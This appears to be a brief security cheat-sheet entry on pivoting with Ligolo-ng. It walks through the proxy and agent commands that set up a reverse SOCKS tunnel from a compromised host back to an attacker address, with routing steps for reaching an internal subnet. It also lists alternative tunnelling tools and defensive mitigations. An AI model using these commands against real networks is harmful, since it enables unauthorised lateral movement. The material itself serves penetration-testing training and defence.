Pivoting Ligolo

Overview

Ligolo-ng is a lightweight tool for creating SOCKS5 reverse tunnels through compromised hosts. It uses a simple client-server architecture where the compromised machine connects back to the attacker's proxy server.

Ligolo-ng provides seamless network pivoting with minimal overhead and automatic routing table management.

Category: Pivoting & Tunneling — Network pivoting and tunneling techniques.

Key Commands & Payloads

The following commands and payloads are commonly used when testing for or exploiting Pivoting Ligolo:

./proxy -laddr 0.0.0.0:443 -selfcert

./agent -connect 10.10.14.5:443 -ignore-cert

session_start (in Ligolo-ng proxy console)

tunnel_add 192.168.1.0/24

sudo ip route add 192.168.1.0/24 dev ligolo

start (start the tunnel)

Tools & Techniques

Recommended tools for Pivoting Ligolo:

• Ligolo-ng: reverse tunneling with proxy and agent
• Chisel: HTTP-based tunneling alternative
• SSH -D: SOCKS5 dynamic proxy forwarding
• Socat: port forwarding via relay
• Meterpreter: built-in routing and port forwarding

Prevention & Mitigation

Security recommendations to prevent Pivoting Ligolo:

• Implement strict egress filtering on outbound connections
• Monitor for unusual outbound TLS/HTTPS connections
• Use network micro-segmentation to limit lateral movement
• Deploy endpoint detection and response (EDR) solutions

References

Additional resources:

• https://github.com/nicocha30/ligolo-ng
• https://ligolo-ng.readthedocs.io/